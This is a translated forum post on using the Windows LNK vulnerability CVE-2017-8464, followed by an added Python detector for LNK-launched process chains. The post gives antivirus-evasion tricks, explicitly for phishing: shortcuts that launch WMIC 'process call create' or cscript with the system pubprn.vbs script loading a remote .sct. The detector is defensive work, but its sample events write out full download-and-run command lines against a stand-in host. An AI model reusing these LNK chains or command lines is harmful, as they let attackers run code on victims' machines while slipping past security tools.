
CVE-2017-8464 new play - Microsoft Windows LNK


dEEpEst


When the Microsoft Windows LNK remote code execution vulnerability first came out, some people used it to execute code through PowerShell. Not long afterwards the major antivirus products started detecting that kind of LNK file, so here are two more interesting ways to use it; try them and see for yourself.

0x00. Vulnerability Introduction

Vulnerability Code:

CVE-2017-8464

Vulnerability Name:

Microsoft Windows LNK Remote Code Execution Vulnerability

Vulnerability Description:

An attacker could present a removable drive or remote share that contains malicious .LNK files and associated malicious binaries. When a user opens this drive (or remote share) in Windows Explorer or any other application that parses the .LNK file, the malicious binary executes code of the attacker's choice on the target system. An attacker who successfully exploited the vulnerability could gain the same user rights as the local user.

0x01. PowerShell usage

When the vulnerability had just come out, some players used the following code to launch PowerShell from the LNK, load a remote script and execute code:

This is the hidden content, please

This approach has many advantages: first, PowerShell is powerful and good at evading antivirus; second, it loads the remote script directly, so there is no need to drop a local binary as in the vulnerability description.

But this method is now detected by the major antivirus products, so evasion is difficult, as shown below:

This is the hidden content, please

To get past the antivirus now, other means are needed; two are described below.

0x02. WMIC usage

WMIC is a system management tool that ships with Windows; it is more powerful than cmd and is meant to replace it. The help documentation can be found at

This is the hidden content, please
).aspx; you can also type wmic at the cmd prompt to enter the interactive interface and view the help there. No further description here.

Let's look at the most basic way to run a system command with wmic:

wmic /node:127.0.0.1 process call create "calc.exe"

Typing this at the cmd prompt executes calc.exe. Now let's try calling wmic from the LNK to run the command:

This is the hidden content, please

This perfectly bypasses 360's detection, and in testing it ran successfully.

Although it is not as powerful as PowerShell, it is more powerful than cmd, and there is still a lot to explore.

Of course, this method can also be combined with PowerShell to run remote code; how you combine them is up to you, for example:

This is the hidden content, please

0x03. Using whitelisted scripts

Without further ado, here is a method a big brother once recommended to me:

This is the hidden content, please

This is the hidden content, please

Looking at this code: it first uses cscript to run C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs. pubprn.vbs is the printer script that ships with the system, and the script: https:// argument behind it is what loads the .sct file and executes the VB code inside it. I did not look into the principle; this is probably the big brother's advanced stuff.

So let's set the principle aside and test it together with the .LNK file vulnerability, writing the code directly into the .LNK target:

This is the hidden content, please

It executed successfully, as follows:

This is the hidden content, please

Scanning the shortcuts generated with the several methods above gives the following result: only the PowerShell one was detected; the other two bypass 360 and execute the malicious code successfully.

This is the hidden content, please

0x04

CVE-2017-8464 itself has no technical content; in principle a shortcut behaves just like a hyperlink. It is only with the growth of PowerShell that loading and running remote scripts this way became more and more popular, because it is well hidden and leaves few traces.

Because of this hyperlink-like nature, a shortcut can launch any program or script on the system, which leaves a lot of room to play. Besides the two new tricks described above, any code can be executed by running a shortcut, and the shortcut icon can easily be changed to any of the icons that ship with the system to hide it further, making it a handy weapon for phishing.
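As an added example (not from the original post), the following Python classifies constructed process-creation events for the three LNK-launched chains described above: wmic "process call create", cscript running pubprn.vbs with a script: URL, and PowerShell loading a remote script. The rule names, the sample command lines and URLs, and the choice of explorer.exe and WmiPrvSE.exe as expected parents are assumptions made for the example.

```python
import re

# Parents an LNK-launched child appears under: explorer.exe for a double-clicked
# shortcut, WmiPrvSE.exe for a child spawned via WMIC "process call create".
LNK_PARENTS = {"explorer.exe", "wmiprvse.exe"}

# (rule name, child image regex, command-line regex) for the three LNK targets the post covers.
RULES = [
    ("lnk_wmic_process_create", re.compile(r"^wmic\.exe$"),
     re.compile(r"\bprocess\s+call\s+create\b", re.I)),
    ("lnk_pubprn_sct_loader", re.compile(r"^[wc]script\.exe$"),
     re.compile(r"pubprn\.vbs.*\bscript:", re.I)),
    ("lnk_powershell_remote_script", re.compile(r"^powershell\.exe$"),
     re.compile(r"https?://", re.I)),
]

# Constructed sample events (Sysmon Event ID 1 style fields), not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": 'wmic /node:127.0.0.1 process call create "calc.exe"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r"cscript C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://example.invalid/x.sct"},
    {"ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm https://example.invalid/stage.ps1)"'},
    {"ParentImage": r"C:\Windows\explorer.exe",          # benign: shortcut to Notepad
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",      # benign: admin querying WMI from cmd
     "Image": r"C:\Windows\System32\wbem\WMIC.exe", "CommandLine": "wmic os get caption"},
]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the matching rule name for one process-creation event, or None."""
    if basename(event["ParentImage"]) not in LNK_PARENTS:
        return None
    image = basename(event["Image"])
    for name, image_re, cmd_re in RULES:
        if image_re.match(image) and cmd_re.search(event["CommandLine"]):
            return name
    return None

def scan(events):
    """Return [(index, rule)] for every event that matches a rule."""
    return [(i, r) for i, e in enumerate(events) if (r := classify(e))]
```

Running scan(SAMPLE_EVENTS) flags the first three events and leaves the two benign ones alone; in practice the same logic applies to Sysmon or EDR process-creation telemetry.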
